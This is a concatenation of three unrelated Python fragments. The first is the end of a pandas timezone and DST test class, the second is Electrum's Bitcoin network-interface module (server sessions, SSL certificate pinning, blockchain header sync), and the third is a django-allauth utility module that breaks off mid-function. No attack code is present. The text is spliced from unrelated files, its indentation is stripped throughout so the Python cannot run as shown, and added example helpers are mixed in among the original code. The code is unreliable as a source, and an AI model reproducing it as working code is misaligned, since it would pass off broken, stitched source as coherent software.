expected = Timestamp("3/11/2012 04:00", tz=tzinfo)
result = Timestamp(expected.to_pydatetime())
assert expected == result
def test_timestamp_constructor_near_dst_boundary(self):
# GH#11481 & GH#15777
# Naive string timestamps were being localized incorrectly
# with tz_convert_from_utc_single instead of tz_localize_to_utc
for tz in ["Europe/Brussels", "Europe/Prague"]:
result = Timestamp("2015-10-25 01:00", tz=tz)
expected = Timestamp("2015-10-25 01:00").tz_localize(tz)
assert result == expected
msg = "Cannot infer dst time from 2015-10-25 02:00:00"
with pytest.raises(pytz.AmbiguousTimeError, match=msg):
Timestamp("2015-10-25 02:00", tz=tz)
result = Timestamp("2017-03-26 01:00", tz="Europe/Paris")
expected = Timestamp("2017-03-26 01:00").tz_localize("Europe/Paris")
assert result == expected
msg = "2017-03-26 02:00"
with pytest.raises(pytz.NonExistentTimeError, match=msg):
Timestamp("2017-03-26 02:00", tz="Europe/Paris")
# GH#11708
naive = Timestamp("2015-11-18 10:00:00")
result = naive.tz_localize("UTC").tz_convert("Asia/Kolkata")
expected = Timestamp("2015-11-18 15:30:00+0530", tz="Asia/Kolkata")
assert result == expected
# GH#15823
result = Timestamp("2017-03-26 00:00", tz="Europe/Paris")
expected = Timestamp("2017-03-26 00:00:00+0100", tz="Europe/Paris")
assert result == expected
result = Timestamp("2017-03-26 01:00", tz="Europe/Paris")
expected = Timestamp("2017-03-26 01:00:00+0100", tz="Europe/Paris")
assert result == expected
msg = "2017-03-26 02:00"
with pytest.raises(pytz.NonExistentTimeError, match=msg):
Timestamp("2017-03-26 02:00", tz="Europe/Paris")
result = Timestamp("2017-03-26 02:00:00+0100", tz="Europe/Paris")
naive = Timestamp(result.value)
expected = naive.tz_localize("UTC").tz_convert("Europe/Paris")
assert result == expected
result = Timestamp("2017-03-26 03:00", tz="Europe/Paris")
expected = Timestamp("2017-03-26 03:00:00+0200", tz="Europe/Paris")
assert result == expected
@pytest.mark.parametrize(
"tz",
[
pytz.timezone("US/Eastern"),
gettz("US/Eastern"),
"US/Eastern",
"dateutil/US/Eastern",
],
)
def test_timestamp_constructed_by_date_and_tz(self, tz):
# GH#2993, Timestamp cannot be constructed by datetime.date
# and tz correctly
result = Timestamp(date(2012, 3, 11), tz=tz)
expected = Timestamp("3/11/2012", tz=tz)
assert result.hour == expected.hour
assert result == expected
@pytest.mark.parametrize(
"tz",
[
pytz.timezone("US/Eastern"),
gettz("US/Eastern"),
"US/Eastern",
"dateutil/US/Eastern",
],
)
def test_timestamp_add_timedelta_push_over_dst_boundary(self, tz):
# GH#1389
# 4 hours before DST transition
stamp = Timestamp("3/10/2012 22:00", tz=tz)
result = stamp + timedelta(hours=6)
# spring forward, + "7" hours
expected = Timestamp("3/11/2012 05:00", tz=tz)
assert result == expected
def test_timestamp_timetz_equivalent_with_datetime_tz(self, tz_naive_fixture):
# GH21358
tz = timezones.maybe_get_tz(tz_naive_fixture)
stamp = Timestamp("2018-06-04 10:20:30", tz=tz)
_datetime = datetime(2018, 6, 4, hour=10, minute=20, second=30, tzinfo=tz)
result = stamp.timetz()
expected = _datetime.timetz()
assert result == expected
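# Illustrative sketch (not part of the original suite, hypothetical values):
# tz_localize attaches a zone without changing the wall time, tz_convert
# changes the wall time but keeps the underlying value, and the
# nonexistent="shift_forward" option moves a spring-forward gap time onto
# the first valid instant.
def _example_tz_semantics():
    ts = Timestamp("2014-08-01 09:00")
    localized = ts.tz_localize("US/Eastern")  # same wall clock, now aware
    converted = localized.tz_convert("UTC")   # 13:00 UTC, same .value
    assert localized.value == converted.value
    gap = Timestamp("2015-03-08 02:30")  # does not exist in US/Eastern
    shifted = gap.tz_localize("US/Eastern", nonexistent="shift_forward")
    assert shifted == Timestamp("2015-03-08 03:00", tz="US/Eastern")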
|
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import ssl
import sys
import traceback
import asyncio
import socket
from typing import Tuple, Union, List, TYPE_CHECKING, Optional
from collections import defaultdict
from ipaddress import IPv4Network, IPv6Network, ip_address
import itertools
import logging
import aiorpcx
from aiorpcx import RPCSession, Notification, NetAddress
from aiorpcx.curio import timeout_after, TaskTimeout
from aiorpcx.jsonrpc import JSONRPC, CodeMessageError
from aiorpcx.rawsocket import RSClient
import certifi
from .util import ignore_exceptions, log_exceptions, bfh, SilentTaskGroup
from . import util
from . import x509
from . import pem
from . import version
from . import blockchain
from .blockchain import Blockchain
from . import constants
from .i18n import _
from .logging import Logger
if TYPE_CHECKING:
from .network import Network
ca_path = certifi.where()
BUCKET_NAME_OF_ONION_SERVERS = 'onion'
class NetworkTimeout:
# seconds
class Generic:
NORMAL = 30
RELAXED = 45
MOST_RELAXED = 180
class Urgent(Generic):
NORMAL = 10
RELAXED = 20
MOST_RELAXED = 60
class NotificationSession(RPCSession):
def __init__(self, *args, **kwargs):
super(NotificationSession, self).__init__(*args, **kwargs)
self.subscriptions = defaultdict(list)
self.cache = {}
self.default_timeout = NetworkTimeout.Generic.NORMAL
self._msg_counter = itertools.count(start=1)
self.interface = None # type: Optional[Interface]
self.cost_hard_limit = 0 # disable aiorpcx resource limits
async def handle_request(self, request):
self.maybe_log(f"--> {request}")
try:
if isinstance(request, Notification):
params, result = request.args[:-1], request.args[-1]
key = self.get_hashable_key_for_rpc_call(request.method, params)
if key in self.subscriptions:
self.cache[key] = result
for queue in self.subscriptions[key]:
await queue.put(request.args)
else:
                    raise Exception('unexpected notification')
else:
                raise Exception('unexpected request. not a notification')
except Exception as e:
self.interface.logger.info(f"error handling request {request}. exc: {repr(e)}")
await self.close()
async def send_request(self, *args, timeout=None, **kwargs):
# note: semaphores/timeouts/backpressure etc are handled by
# aiorpcx. the timeout arg here in most cases should not be set
msg_id = next(self._msg_counter)
self.maybe_log(f"<-- {args} {kwargs} (id: {msg_id})")
try:
# note: RPCSession.send_request raises TaskTimeout in case of a timeout.
# TaskTimeout is a subclass of CancelledError, which is *suppressed* in TaskGroups
response = await asyncio.wait_for(
super().send_request(*args, **kwargs),
timeout)
except (TaskTimeout, asyncio.TimeoutError) as e:
raise RequestTimedOut(f'request timed out: {args} (id: {msg_id})') from e
except CodeMessageError as e:
self.maybe_log(f"--> {repr(e)} (id: {msg_id})")
raise
else:
self.maybe_log(f"--> {response} (id: {msg_id})")
return response
def set_default_timeout(self, timeout):
self.sent_request_timeout = timeout
self.max_send_delay = timeout
async def subscribe(self, method: str, params: List, queue: asyncio.Queue):
# note: until the cache is written for the first time,
# each 'subscribe' call might make a request on the network.
key = self.get_hashable_key_for_rpc_call(method, params)
self.subscriptions[key].append(queue)
if key in self.cache:
result = self.cache[key]
else:
result = await self.send_request(method, params)
self.cache[key] = result
await queue.put(params + [result])
def unsubscribe(self, queue):
"""Unsubscribe a callback to free object references to enable GC."""
# note: we can't unsubscribe from the server, so we keep receiving
# subsequent notifications
for v in self.subscriptions.values():
if queue in v:
v.remove(queue)
@classmethod
def get_hashable_key_for_rpc_call(cls, method, params):
"""Hashable index for subscriptions and cache"""
return str(method) + repr(params)
def maybe_log(self, msg: str) -> None:
if not self.interface: return
if self.interface.debug or self.interface.network.debug:
self.interface.logger.debug(msg)
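# Illustrative sketch (hypothetical caller, not part of the original module):
# a consumer subscribes with an asyncio.Queue; the first call for a given key
# may hit the network, later calls are answered from self.cache, and every
# subscriber receives params + [result] items on its queue.
async def _example_subscribe_usage(session: NotificationSession):
    queue = asyncio.Queue()
    await session.subscribe('blockchain.headers.subscribe', [], queue)
    first_item = await queue.get()  # params + [result]
    session.unsubscribe(queue)  # drop the reference so the queue can be GC'd
    return first_item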
class GracefulDisconnect(Exception):
log_level = logging.INFO
def __init__(self, *args, log_level=None, **kwargs):
Exception.__init__(self, *args, **kwargs)
if log_level is not None:
self.log_level = log_level
class RequestTimedOut(GracefulDisconnect):
def __str__(self):
return _("Network request timed out.")
class ErrorParsingSSLCert(Exception): pass
class ErrorGettingSSLCertFromServer(Exception): pass
class ConnectError(Exception): pass
class _RSClient(RSClient):
async def create_connection(self):
try:
return await super().create_connection()
except OSError as e:
# note: using "from e" here will set __cause__ of ConnectError
raise ConnectError(e) from e
def deserialize_server(server_str: str) -> Tuple[str, str, str]:
# host might be IPv6 address, hence do rsplit:
host, port, protocol = str(server_str).rsplit(':', 2)
if not host:
raise ValueError('host must not be empty')
if protocol not in ('s', 't'):
raise ValueError('invalid network protocol: {}'.format(protocol))
int(port) # Throw if cannot be converted to int
if not (0 < int(port) < 2**16):
raise ValueError('port {} is out of valid range'.format(port))
return host, port, protocol
def serialize_server(host: str, port: Union[str, int], protocol: str) -> str:
return str(':'.join([host, str(port), protocol]))
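# Illustrative sketch (hypothetical server strings): deserialize_server and
# serialize_server round-trip the "host:port:protocol" format, and the rsplit
# keeps IPv6 hosts containing ':' intact.
def _example_server_roundtrip():
    host, port, protocol = deserialize_server('electrum.example.org:50002:s')
    assert (host, port, protocol) == ('electrum.example.org', '50002', 's')
    assert serialize_server(host, port, protocol) == 'electrum.example.org:50002:s'
    assert deserialize_server('::1:50001:t') == ('::1', '50001', 't')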
class Interface(Logger):
LOGGING_SHORTCUT = 'i'
def __init__(self, network: 'Network', server: str, proxy: Optional[dict]):
self.ready = asyncio.Future()
self.got_disconnected = asyncio.Future()
self.server = server
self.host, self.port, self.protocol = deserialize_server(self.server)
self.port = int(self.port)
Logger.__init__(self)
assert network.config.path
self.cert_path = os.path.join(network.config.path, 'certs', self.host)
self.blockchain = None
self._requested_chunks = set()
self.network = network
self._set_proxy(proxy)
self.session = None # type: NotificationSession
self._ipaddr_bucket = None
self.tip_header = None
self.tip = 0
# Dump network messages (only for this interface). Set at runtime from the console.
self.debug = False
asyncio.run_coroutine_threadsafe(
self.network.main_taskgroup.spawn(self.run()), self.network.asyncio_loop)
self.group = SilentTaskGroup()
def diagnostic_name(self):
return f"{self.host}:{self.port}"
def _set_proxy(self, proxy: dict):
if proxy:
username, pw = proxy.get('user'), proxy.get('password')
if not username or not pw:
auth = None
else:
auth = aiorpcx.socks.SOCKSUserAuth(username, pw)
addr = NetAddress(proxy['host'], proxy['port'])
if proxy['mode'] == "socks4":
self.proxy = aiorpcx.socks.SOCKSProxy(addr, aiorpcx.socks.SOCKS4a, auth)
elif proxy['mode'] == "socks5":
self.proxy = aiorpcx.socks.SOCKSProxy(addr, aiorpcx.socks.SOCKS5, auth)
else:
raise NotImplementedError # http proxy not available with aiorpcx
else:
self.proxy = None
async def is_server_ca_signed(self, ca_ssl_context):
"""Given a CA enforcing SSL context, returns True if the connection
can be established. Returns False if the server has a self-signed
certificate but otherwise is okay. Any other failures raise.
"""
try:
await self.open_session(ca_ssl_context, exit_early=True)
except ConnectError as e:
cause = e.__cause__
if isinstance(cause, ssl.SSLError) and cause.reason == 'CERTIFICATE_VERIFY_FAILED':
# failures due to self-signed certs are normal
return False
raise
return True
async def _try_saving_ssl_cert_for_first_time(self, ca_ssl_context):
ca_signed = await self.is_server_ca_signed(ca_ssl_context)
if ca_signed:
with open(self.cert_path, 'w') as f:
# empty file means this is CA signed, not self-signed
f.write('')
else:
await self.save_certificate()
def _is_saved_ssl_cert_available(self):
if not os.path.exists(self.cert_path):
return False
with open(self.cert_path, 'r') as f:
contents = f.read()
if contents == '': # CA signed
return True
# pinned self-signed cert
try:
b = pem.dePem(contents, 'CERTIFICATE')
except SyntaxError as e:
self.logger.info(f"error parsing already saved cert: {e}")
raise ErrorParsingSSLCert(e) from e
try:
x = x509.X509(b)
except Exception as e:
self.logger.info(f"error parsing already saved cert: {e}")
raise ErrorParsingSSLCert(e) from e
try:
x.check_date()
return True
except x509.CertificateError as e:
self.logger.info(f"certificate has expired: {e}")
os.unlink(self.cert_path) # delete pinned cert only in this case
return False
async def _get_ssl_context(self):
if self.protocol != 's':
# using plaintext TCP
return None
# see if we already have cert for this server; or get it for the first time
ca_sslc = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH, cafile=ca_path)
if not self._is_saved_ssl_cert_available():
try:
await self._try_saving_ssl_cert_for_first_time(ca_sslc)
except (OSError, ConnectError, aiorpcx.socks.SOCKSError) as e:
raise ErrorGettingSSLCertFromServer(e) from e
# now we have a file saved in our certificate store
siz = os.stat(self.cert_path).st_size
if siz == 0:
# CA signed cert
sslc = ca_sslc
else:
# pinned self-signed cert
sslc = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=self.cert_path)
            sslc.check_hostname = False
return sslc
def handle_disconnect(func):
async def wrapper_func(self: 'Interface', *args, **kwargs):
try:
return await func(self, *args, **kwargs)
except GracefulDisconnect as e:
self.logger.log(e.log_level, f"disconnecting due to {repr(e)}")
except aiorpcx.jsonrpc.RPCError as e:
self.logger.warning(f"disconnecting due to {repr(e)}")
self.logger.debug(f"(disconnect) trace for {repr(e)}", exc_info=True)
finally:
await self.network.connection_down(self)
if not self.got_disconnected.done():
self.got_disconnected.set_result(1)
# if was not 'ready' yet, schedule waiting coroutines:
self.ready.cancel()
return wrapper_func
@ignore_exceptions # do not kill main_taskgroup
@log_exceptions
@handle_disconnect
async def run(self):
try:
ssl_context = await self._get_ssl_context()
except (ErrorParsingSSLCert, ErrorGettingSSLCertFromServer) as e:
self.logger.info(f'disconnecting due to: {repr(e)}')
return
try:
await self.open_session(ssl_context)
except (asyncio.CancelledError, ConnectError, aiorpcx.socks.SOCKSError) as e:
self.logger.info(f'disconnecting due to: {repr(e)}')
return
def mark_ready(self):
if self.ready.cancelled():
raise GracefulDisconnect('conn establishment was too slow; *ready* future was cancelled')
if self.ready.done():
return
assert self.tip_header
chain = blockchain.check_header(self.tip_header)
if not chain:
self.blockchain = blockchain.get_best_chain()
else:
self.blockchain = chain
assert self.blockchain is not None
self.logger.info(f"set blockchain with height {self.blockchain.height()}")
self.ready.set_result(1)
async def save_certificate(self):
if not os.path.exists(self.cert_path):
# we may need to retry this a few times, in case the handshake hasn't completed
for _ in range(10):
dercert = await self.get_certificate()
if dercert:
self.logger.info("succeeded in getting cert")
with open(self.cert_path, 'w') as f:
cert = ssl.DER_cert_to_PEM_cert(dercert)
# workaround android bug
cert = re.sub("([^\n])-----END CERTIFICATE-----","\\1\n-----END CERTIFICATE-----",cert)
f.write(cert)
                        # note: close() flushes, but we can't fsync a file once
                        # it is closed, and we must flush before fsyncing:
                        # flush() writes to the OS buffer, fsync() forces the
                        # OS buffer to disk.
f.flush()
os.fsync(f.fileno())
break
await asyncio.sleep(1)
else:
raise GracefulDisconnect("could not get certificate after 10 tries")
async def get_certificate(self):
sslc = ssl.SSLContext()
try:
async with _RSClient(session_factory=RPCSession,
host=self.host, port=self.port,
ssl=sslc, proxy=self.proxy) as session:
return session.transport._asyncio_transport._ssl_protocol._sslpipe._sslobj.getpeercert(True)
except ValueError:
return None
async def get_block_header(self, height, assert_mode):
self.logger.info(f'requesting block header {height} in mode {assert_mode}')
# use lower timeout as we usually have network.bhi_lock here
timeout = self.network.get_network_timeout_seconds(NetworkTimeout.Urgent)
res = await self.session.send_request('blockchain.block.header', [height], timeout=timeout)
return blockchain.deserialize_header(bytes.fromhex(res), height)
async def request_chunk(self, height, tip=None, *, can_return_early=False):
index = height // 2016
if can_return_early and index in self._requested_chunks:
return
self.logger.info(f"requesting chunk from height {height}")
size = 2016
if tip is not None:
size = min(size, tip - index * 2016 + 1)
size = max(size, 0)
try:
self._requested_chunks.add(index)
res = await self.session.send_request('blockchain.block.headers', [index * 2016, size])
finally:
            self._requested_chunks.discard(index)
conn = self.blockchain.connect_chunk(index, res['hex'])
if not conn:
return conn, 0
return conn, res['count']
def is_main_server(self) -> bool:
return self.network.default_server == self.server
async def open_session(self, sslc, exit_early=False):
async with _RSClient(session_factory=NotificationSession,
host=self.host, port=self.port,
ssl=sslc, proxy=self.proxy) as session:
self.session = session # type: NotificationSession
self.session.interface = self
self.session.set_default_timeout(self.network.get_network_timeout_seconds(NetworkTimeout.Generic))
try:
ver = await session.send_request('server.version', [self.client_name(), version.PROTOCOL_VERSION])
except aiorpcx.jsonrpc.RPCError as e:
raise GracefulDisconnect(e) # probably 'unsupported protocol version'
if exit_early:
return
if not self.network.check_interface_against_healthy_spread_of_connected_servers(self):
raise GracefulDisconnect(f'too many connected servers already '
f'in bucket {self.bucket_based_on_ipaddress()}')
self.logger.info(f"connection established. version: {ver}")
try:
async with self.group as group:
await group.spawn(self.ping)
await group.spawn(self.run_fetch_blocks)
await group.spawn(self.monitor_connection)
except aiorpcx.jsonrpc.RPCError as e:
if e.code in (JSONRPC.EXCESSIVE_RESOURCE_USAGE,
JSONRPC.SERVER_BUSY,
JSONRPC.METHOD_NOT_FOUND):
raise GracefulDisconnect(e, log_level=logging.WARNING) from e
raise
async def monitor_connection(self):
while True:
await asyncio.sleep(1)
if not self.session or self.session.is_closing():
raise GracefulDisconnect('session was closed')
async def ping(self):
while True:
await asyncio.sleep(300)
await self.session.send_request('server.ping')
async def close(self):
if self.session:
await self.session.close()
# monitor_connection will cancel tasks
async def run_fetch_blocks(self):
header_queue = asyncio.Queue()
await self.session.subscribe('blockchain.headers.subscribe', [], header_queue)
while True:
item = await header_queue.get()
raw_header = item[0]
height = raw_header['height']
header = blockchain.deserialize_header(bfh(raw_header['hex']), height)
self.tip_header = header
self.tip = height
if self.tip < constants.net.max_checkpoint():
raise GracefulDisconnect('server tip below max checkpoint')
self.mark_ready()
await self._process_header_at_tip()
self.network.trigger_callback('network_updated')
await self.network.switch_unwanted_fork_interface()
await self.network.switch_lagging_interface()
async def _process_header_at_tip(self):
height, header = self.tip, self.tip_header
async with self.network.bhi_lock:
if self.blockchain.height() >= height and self.blockchain.check_header(header):
# another interface amended the blockchain
self.logger.info(f"skipping header {height}")
return
_, height = await self.step(height, header)
# in the simple case, height == self.tip+1
if height <= self.tip:
await self.sync_until(height)
self.network.trigger_callback('blockchain_updated')
async def sync_until(self, height, next_height=None):
if next_height is None:
next_height = self.tip
last = None
while last is None or height <= next_height:
prev_last, prev_height = last, height
if next_height > height + 10:
could_connect, num_headers = await self.request_chunk(height, next_height)
if not could_connect:
if height <= constants.net.max_checkpoint():
raise GracefulDisconnect('server chain conflicts with checkpoints or genesis')
last, height = await self.step(height)
continue
self.network.trigger_callback('network_updated')
height = (height // 2016 * 2016) + num_headers
assert height <= next_height+1, (height, self.tip)
last = 'catchup'
else:
last, height = await self.step(height)
assert (prev_last, prev_height) != (last, height), 'had to prevent infinite loop in interface.sync_until'
return last, height
async def step(self, height, header=None):
assert 0 <= height <= self.tip, (height, self.tip)
if header is None:
header = await self.get_block_header(height, 'catchup')
chain = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
if chain:
self.blockchain = chain if isinstance(chain, Blockchain) else self.blockchain
# note: there is an edge case here that is not handled.
# we might know the blockhash (enough for check_header) but
# not have the header itself. e.g. regtest chain with only genesis.
# this situation resolves itself on the next block
return 'catchup', height+1
can_connect = blockchain.can_connect(header) if 'mock' not in header else header['mock']['connect'](height)
if not can_connect:
self.logger.info(f"can't connect {height}")
height, header, bad, bad_header = await self._search_headers_backwards(height, header)
chain = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
can_connect = blockchain.can_connect(header) if 'mock' not in header else header['mock']['connect'](height)
assert chain or can_connect
if can_connect:
self.logger.info(f"could connect {height}")
height += 1
if isinstance(can_connect, Blockchain): # not when mocking
self.blockchain = can_connect
self.blockchain.save_header(header)
return 'catchup', height
good, bad, bad_header = await self._search_headers_binary(height, bad, bad_header, chain)
return await self._resolve_potential_chain_fork_given_forkpoint(good, bad, bad_header)
async def _search_headers_binary(self, height, bad, bad_header, chain):
assert bad == bad_header['block_height']
_assert_header_does_not_check_against_any_chain(bad_header)
self.blockchain = chain if isinstance(chain, Blockchain) else self.blockchain
good = height
while True:
assert good < bad, (good, bad)
height = (good + bad) // 2
self.logger.info(f"binary step. good {good}, bad {bad}, height {height}")
header = await self.get_block_header(height, 'binary')
chain = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
if chain:
self.blockchain = chain if isinstance(chain, Blockchain) else self.blockchain
good = height
else:
bad = height
bad_header = header
if good + 1 == bad:
break
mock = 'mock' in bad_header and bad_header['mock']['connect'](height)
real = not mock and self.blockchain.can_connect(bad_header, check_height=False)
if not real and not mock:
raise Exception('unexpected bad header during binary: {}'.format(bad_header))
_assert_header_does_not_check_against_any_chain(bad_header)
self.logger.info(f"binary search exited. good {good}, bad {bad}")
return good, bad, bad_header
async def _resolve_potential_chain_fork_given_forkpoint(self, good, bad, bad_header):
assert good + 1 == bad
assert bad == bad_header['block_height']
_assert_header_does_not_check_against_any_chain(bad_header)
# 'good' is the height of a block 'good_header', somewhere in self.blockchain.
# bad_header connects to good_header; bad_header itself is NOT in self.blockchain.
bh = self.blockchain.height()
assert bh >= good, (bh, good)
if bh == good:
height = good + 1
self.logger.info(f"catching up from {height}")
return 'no_fork', height
# this is a new fork we don't yet have
height = bad + 1
self.logger.info(f"new fork at bad height {bad}")
forkfun = self.blockchain.fork if 'mock' not in bad_header else bad_header['mock']['fork']
b = forkfun(bad_header) # type: Blockchain
self.blockchain = b
assert b.forkpoint == bad
return 'fork', height
async def _search_headers_backwards(self, height, header):
async def iterate():
nonlocal height, header
checkp = False
if height <= constants.net.max_checkpoint():
height = constants.net.max_checkpoint()
checkp = True
header = await self.get_block_header(height, 'backward')
chain = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
can_connect = blockchain.can_connect(header) if 'mock' not in header else header['mock']['connect'](height)
if chain or can_connect:
return False
if checkp:
raise GracefulDisconnect("server chain conflicts with checkpoints")
return True
bad, bad_header = height, header
_assert_header_does_not_check_against_any_chain(bad_header)
with blockchain.blockchains_lock: chains = list(blockchain.blockchains.values())
local_max = max([0] + [x.height() for x in chains]) if 'mock' not in header else float('inf')
height = min(local_max + 1, height - 1)
while await iterate():
bad, bad_header = height, header
delta = self.tip - height
height = self.tip - 2 * delta
_assert_header_does_not_check_against_any_chain(bad_header)
self.logger.info(f"exiting backward mode at {height}")
return height, header, bad, bad_header
@classmethod
def client_name(cls) -> str:
return f'electrum/{version.ELECTRUM_VERSION}'
def is_tor(self):
return self.host.endswith('.onion')
def ip_addr(self) -> Optional[str]:
session = self.session
if not session: return None
peer_addr = session.remote_address()
if not peer_addr: return None
return str(peer_addr.host)
def bucket_based_on_ipaddress(self) -> str:
def do_bucket():
if self.is_tor():
return BUCKET_NAME_OF_ONION_SERVERS
try:
ip_addr = ip_address(self.ip_addr())
except ValueError:
return ''
if not ip_addr:
return ''
if ip_addr.version == 4:
slash16 = IPv4Network(ip_addr).supernet(prefixlen_diff=32-16)
return str(slash16)
elif ip_addr.version == 6:
slash48 = IPv6Network(ip_addr).supernet(prefixlen_diff=128-48)
return str(slash48)
return ''
if not self._ipaddr_bucket:
self._ipaddr_bucket = do_bucket()
return self._ipaddr_bucket
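# Illustrative sketch (hypothetical addresses): servers are bucketed by /16
# for IPv4 and /48 for IPv6, so many servers on one subnet share one bucket.
def _example_ip_buckets():
    assert str(IPv4Network('203.0.113.7').supernet(prefixlen_diff=32 - 16)) == '203.0.0.0/16'
    assert str(IPv6Network('2001:db8:1234::1').supernet(prefixlen_diff=128 - 48)) == '2001:db8:1234::/48'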
def _assert_header_does_not_check_against_any_chain(header: dict) -> None:
chain_bad = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
if chain_bad:
raise Exception('bad_header must not check!')
def check_cert(host, cert):
    try:
        b = pem.dePem(cert, 'CERTIFICATE')
        x = x509.X509(b)
    except Exception:
        traceback.print_exc(file=sys.stdout)
        return
    try:
        x.check_date()
        expired = False
    except Exception:
        expired = True
    m = "host: %s\n" % host
    m += "has_expired: %s\n" % expired
util.print_msg(m)
# Used by tests
def _match_hostname(name, val):
if val == name:
return True
return val.startswith('*.') and name.endswith(val[1:])
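# Illustrative sketch (hypothetical names): exact matches pass, and a leading
# '*.' wildcard matches any subdomain of the remaining suffix.
def _example_match_hostname():
    assert _match_hostname('electrum.example.org', 'electrum.example.org')
    assert _match_hostname('electrum.example.org', '*.example.org')
    assert not _match_hostname('example.org', '*.example.org')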
def test_certificates():
from .simple_config import SimpleConfig
config = SimpleConfig()
mydir = os.path.join(config.path, "certs")
certs = os.listdir(mydir)
for c in certs:
p = os.path.join(mydir,c)
with open(p, encoding='utf-8') as f:
cert = f.read()
check_cert(c, cert)
if __name__ == "__main__":
test_certificates()
|
|
import re
import unicodedata
import json
from django.core.exceptions import ImproperlyConfigured
from django.core.validators import validate_email, ValidationError
from django.core import urlresolvers
from django.db.models import FieldDoesNotExist
from django.db.models.fields import (DateTimeField, DateField,
EmailField, TimeField)
from django.utils import six, dateparse
from django.utils.datastructures import SortedDict
from django.core.serializers.json import DjangoJSONEncoder
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
try:
    import importlib
except ImportError:
    from django.utils import importlib
def _generate_unique_username_base(txts):
username = None
for txt in txts:
if not txt:
continue
username = unicodedata.normalize('NFKD', force_text(txt))
username = username.encode('ascii', 'ignore').decode('ascii')
username = force_text(re.sub('[^\w\s@+.-]', '', username).lower())
        # Django allows '@' in usernames in order to accommodate projects
        # wanting to use the e-mail address as the username. In allauth we
        # don't use this; we already have a proper place for e-mail
        # addresses (EmailAddress), so let's not use the full e-mail
        # address and only take the part leading up to the '@'.
username = username.split('@')[0]
username = username.strip()
username = re.sub('\s+', '_', username)
if username:
break
return username or 'user'
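# Illustrative sketch (hypothetical inputs, not part of the original module):
# the base generator lowercases, strips the e-mail domain and collapses
# whitespace, falling back to 'user' when nothing usable remains.
def _example_username_base():
    assert _generate_unique_username_base(['Jane Doe']) == 'jane_doe'
    assert _generate_unique_username_base(['bob@example.com']) == 'bob'
    assert _generate_unique_username_base([None, '']) == 'user'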
def generate_unique_username(txts):
from .account.app_settings import USER_MODEL_USERNAME_FIELD
username = _generate_unique_username_base(txts)
User = get_user_model()
try:
max_length = User._meta.get_field(USER_MODEL_USERNAME_FIELD).max_length
except FieldDoesNotExist:
raise ImproperlyConfigured(
"USER_MODEL_USERNAME_FIELD does not exist in user-model"
)
i = 0
while True:
try:
if i:
pfx = str(i + 1)
else:
pfx = ''
ret = username[0:max_length - len(pfx)] + pfx
query = {USER_MODEL_USERNAME_FIELD + '__iexact': ret}
User.objects.get(**query)
i += 1
except User.DoesNotExist:
return ret
def valid_email_or_none(email):
ret = None
try:
if email:
validate_email(email)
if len(email) <= EmailField().max_length:
ret = email
except ValidationError:
pass
return ret
def email_address_exists(email, exclude_user=None):
from .account import app_settings as account_settings
from .account.models import EmailAddress
emailaddresses = EmailAddress.objects
if exclude_user:
emailaddresses = emailaddresses.exclude(user=exclude_user)
ret = emailaddresses.filter(email__iexact=email).exists()
if not ret:
email_field = account_settings.USER_MODEL_EMAIL_FIELD
if email_field:
users = get_user_model().objects
if exclude_user:
users = users.exclude(pk=exclude_user.pk)
ret = users.filter(**{email_field+'__iexact': email}).exists()
return ret
def import_attribute(path):
assert isinstance(path, six.string_types)
pkg, attr = path.rsplit('.', 1)
ret = getattr(importlib.import_module(pkg), attr)
return ret
def import_callable(path_or_callable):
if not hasattr(path_or_callable, '__call__'):
ret = import_attribute(path_or_callable)
else:
ret = path_or_callable
return ret
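# Illustrative sketch (stdlib path used purely as an example): import_attribute
# resolves a dotted path to an object, and import_callable passes callables
# through untouched.
def _example_import_helpers():
    assert import_attribute('json.dumps') is json.dumps
    assert import_callable('json.dumps') is json.dumps
    assert import_callable(json.dumps) is json.dumps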
try:
from django.contrib.auth import get_user_model
except ImportError:
# To keep compatibility with Django 1.4
def get_user_model():
from . import app_settings
from django.db.models import get_model
try:
app_label, model_name = app_settings.USER_MODEL.split('.')
except ValueError:
raise ImproperlyConfigured("AUTH_USER_MODEL must be of the"
" form 'app_label.model_name'")
user_model = get_model(app_label, model_name)
if user_model is None:
raise ImproperlyConfigured("AUTH_USER_MODEL refers to model"
" '%s' that has not been installed"
% app_settings.USER_MODEL)
return user_model
def resolve_url(to):
"""
Subset of django.shortcuts.resolve_url (that one is 1.5+)
"""
try:
return urlresolvers.reverse(to)
except urlresolvers.NoReverseMatch:
# If this doesn't "feel" like a URL, re-raise.
if '/' not in to and '.' not in to:
raise
# Finally, fall back and assume it's a URL
return to
def serialize_instance(instance):
"""
Since Django 1.6 items added to the session are no longer pickled,
but JSON encoded by default. We are storing partially complete models
in the session (user, account, token, ...). We cannot use standard
    Django serialization, as these models are not "complete" yet.
Serialization will start complaining about missing relations et al.
"""
ret = dict([(k, v)
for k, v in instance.__dict__.items()
if not k.startswith('_')])
return json.loads(json.dumps(ret, cls=DjangoJSONEncoder))
def deserialize_instance(model, data):
ret = model()
for k, v in data.items():
if v is not None:
try:
f = model._meta.get_field(k)
if isinstance(f, DateTimeField):
